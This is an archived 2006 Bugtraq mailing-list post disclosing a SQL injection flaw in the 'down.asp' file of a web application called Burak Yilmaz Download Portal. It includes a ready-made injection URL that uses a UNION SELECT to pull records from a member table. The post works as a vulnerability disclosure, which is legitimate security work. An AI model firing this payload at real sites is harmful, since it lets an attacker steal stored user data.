lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061219195047.7100.qmail@securityfocus.com> Date: 19 Dec 2006 19:50:47 -0000 From: ShaFuq31@...MaiL.CoM To: bugtraq@...urityfocus.com Subject: Burak Yilmaz Download Portal Sql Injection Vuln. # LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr # script name : Burak Yılmaz Download Portal # Script Download : http://maxiasp.com/sc_yorum.asp?scno=929 # Risk : High # Found By : ShaFuck31 # Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@...T | BLaSTER | UNiKnoX | # Vulnerable file : down.asp #Vuln : http://www.victim.com/ScriptPath/down.asp?id=[SqL] http://www.victim.com/ScriptPath/down.asp?id=-1%20union%20SELECT%20*%20FROM%20uyeler%20WHERE%20uid=36 #Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]